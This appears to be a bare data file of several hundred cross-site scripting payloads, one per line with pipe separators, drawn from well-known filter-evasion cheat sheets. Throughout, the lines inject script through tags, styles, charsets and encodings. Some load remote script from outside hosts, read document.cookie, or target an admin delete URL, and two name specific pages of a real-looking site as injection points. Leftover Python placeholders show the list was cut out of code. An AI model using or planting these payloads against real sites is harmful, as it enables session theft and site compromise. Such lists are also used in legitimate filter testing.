<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> | |
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X | |
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> | |
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d | |
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> | |
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> | |
<style>*[{}@import'%(css)s?]</style>X | |
<div style="font-family:'foo ;color:red;';">XXX | |
<div style="font-family:foo}color=red;">XXX | |
<// style=x:expression\28javascript:alert(1)\29> | |
<style>*{x:expression(javascript:alert(1))}</style> | |
<div style=content:url(%(svg)s)></div> | |
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X | |
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> | |
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X | |
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X | |
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> | |
<x style="background:url('x;color:red;/*')">XXX</x> | |
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> | |
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> | |
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> | |
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> | |
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi | |
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> | |
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ | |
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > | |
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> | |
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> | |
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> | |
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> | |
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> | |
<x style="behavior:url(%(sct)s)"> | |
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> | |
<event-source src="%(event)s" onload="javascript:alert(1)"> | |
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> | |
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>"> | |
<script>%(payload)s</script> | |
<script src=%(jscript)s></script> | |
<script language='javascript' src='%(jscript)s'></script> | |
<script>javascript:alert(1)</script> | |
<IMG SRC="javascript:javascript:alert(1);"> | |
<IMG SRC=javascript:javascript:alert(1)> | |
<IMG SRC=`javascript:javascript:alert(1)`> | |
<SCRIPT SRC=%(jscript)s?<B> | |
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> | |
<BODY ONLOAD=javascript:alert(1)> | |
<BODY ONLOAD=javascript:javascript:alert(1)> | |
<IMG SRC="jav ascript:javascript:alert(1);"> | |
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> | |
<SCRIPT/SRC="%(jscript)s"></SCRIPT> | |
<<SCRIPT>%(payload)s//<</SCRIPT> | |
<IMG SRC="javascript:javascript:alert(1)" | |
<iframe src=%(scriptlet)s < | |
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> | |
<IMG DYNSRC="javascript:javascript:alert(1)"> | |
<IMG LOWSRC="javascript:javascript:alert(1)"> | |
<BGSOUND SRC="javascript:javascript:alert(1);"> | |
<BR SIZE="&{javascript:alert(1)}"> | |
<LAYER SRC="%(scriptlet)s"></LAYER> | |
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> | |
<STYLE>@import'%(css)s';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> | |
<XSS STYLE="behavior: url(%(htc)s);"> | |
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> | |
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> | |
<TABLE BACKGROUND="javascript:javascript:alert(1)"> | |
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> | |
<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> | |
<DIV STYLE="width:expression(javascript:alert(1));"> | |
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> | |
<XSS STYLE="xss:expression(javascript:alert(1))"> | |
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> | |
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> | |
<BASE HREF="javascript:javascript:alert(1);//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> | |
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> | |
<SCRIPT SRC="%(jpg)s"></SCRIPT> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- | |
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X | |
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> | |
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> | |
<STYLE>@import'%(css)s';</STYLE> | |
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> | |
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> | |
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> | |
<style onreadystatechange=javascript:javascript:alert(1);></style> | |
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> | |
<embed code=%(scriptlet)s></embed> | |
<embed code=javascript:javascript:alert(1);></embed> | |
<embed src=%(jscript)s></embed> | |
<frameset onload=javascript:javascript:alert(1)></frameset> | |
<object onerror=javascript:javascript:alert(1)> | |
<embed type="image" src=%(scriptlet)s></embed> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> | |
<IMG SRC=&{javascript:alert(1);};> | |
<a href="javAascript:javascript:alert(1)">test1</a> | |
<a href="javaascript:javascript:alert(1)">test1</a> | |
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> | |
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> | |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; | |
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- | |
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<a onmouseover="alert(document.cookie)">xxs link</a> | |
<a onmouseover=alert(document.cookie)>xxs link</a> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=# onmouseover="alert('xxs')"> | |
<IMG SRC= onmouseover="alert('xxs')"> | |
<IMG onmouseover="alert('xxs')"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
\";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
¼script¾alert(¢XSS¢)¼/script¾ | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> | |
<iframe src="	javascript:prompt(1)	"> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt >alert(1) {Opera} | |
<img/src=`` onerror=this.onerror=confirm(1) | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=``
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /**/>/**/alert(1)/**/</script /**/ | |
"><h1/onmouseover='\u0061lert(1)'> | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X | |
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe// src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
'';!--"<XSS>=&{()} | |
'>//\\,<'>">">"*" | |
'); alert('XSS | |
<script>alert(1);</script> | |
<script>alert('XSS');</script> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<scr<script>ipt>alert('XSS');</scr</script>ipt> | |
<script>alert(String.fromCharCode(88,83,83))</script> | |
<img src=foo.png onerror=alert(/xssed/) /> | |
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> | |
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> | |
<marquee><script>alert('XSS')</script></marquee> | |
<IMG SRC=\"jav	ascript:alert('XSS');\"> | |
<IMG SRC=\"jav
ascript:alert('XSS');\"> | |
<IMG SRC=\"jav
ascript:alert('XSS');\"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
"><script>alert(0)</script> | |
<script src=http://yoursite.com/your_files.js></script> | |
</title><script>alert(/xss/)</script> | |
</textarea><script>alert(/xss/)</script> | |
<IMG LOWSRC=\"javascript:alert('XSS')\"> | |
<IMG DYNSRC=\"javascript:alert('XSS')\"> | |
<font style='color:expression(alert(document.cookie))'> | |
<img src="javascript:alert('XSS')"> | |
<script language="JavaScript">alert('XSS')</script> | |
<body onunload="javascript:alert('XSS');"> | |
<body onLoad="alert('XSS');" | |
[color=red' onmouseover="alert('xss')"]mouse over[/color] | |
"/></a></><img src=1.gif onerror=alert(1)> | |
window.alert("Bonjour !"); | |
<div style="x:expression((window.r==1)?'':eval('r=1; | |
alert(String.fromCharCode(88,83,83));'))"> | |
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> | |
"><script alert(String.fromCharCode(88,83,83))</script> | |
'>><marquee><h1>XSS</h1></marquee> | |
'">><script>alert('XSS')</script> | |
'">><marquee><h1>XSS</h1></marquee> | |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> | |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> | |
<script>var var = 1; alert(var)</script> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<?='<SCRIPT>alert("XSS")</SCRIPT>'?> | |
<IMG SRC='vbscript:msgbox(\"XSS\")'> | |
" onfocus=alert(document.domain) "> <" | |
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> | |
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS | |
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out | |
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out | |
<br size=\"&{alert('XSS')}\"> | |
<scrscriptipt>alert(1)</scrscriptipt> | |
</br style=a:expression(alert())> | |
</script><script>alert(1)</script> | |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
[color=red width=expression(alert(123))][color] | |
<BASE HREF="javascript:alert('XSS');//"> | |
Execute(MsgBox(chr(88)&chr(83)&chr(83)))< | |
"></iframe><script>alert(123)</script> | |
<body onLoad="while(true) alert('XSS');"> | |
'"></title><script>alert(1111)</script> | |
</textarea>'"><script>alert(document.cookie)</script> | |
'""><script language="JavaScript"> alert('X \nS \nS');</script> | |
</script></script><<<<script><>>>><<<script>alert(123)</script> | |
<html><noalert><noscript>(123)</noscript><script>(123)</script> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
'></select><script>alert(123)</script> | |
'>"><script src = 'http://www.site.com/XSS.js'></script> | |
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> | |
<SCRIPT>document.write("XSS");</SCRIPT> | |
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); | |
='><script>alert("xss")</script> | |
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> | |
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> | |
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> | |
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> | |
src="http://www.site.com/XSS.js"></script> | |
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= | |
!--" /><script>alert('xss');</script> | |
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> | |
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> | |
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> | |
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> | |
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> | |
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> | |
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> | |
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> | |
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' | |
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" | |
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' | |
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? | |
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? | |
'); alert('xss'); var x=' | |
\\'); alert(\'xss\');var x=\' | |
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); | |
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> | |
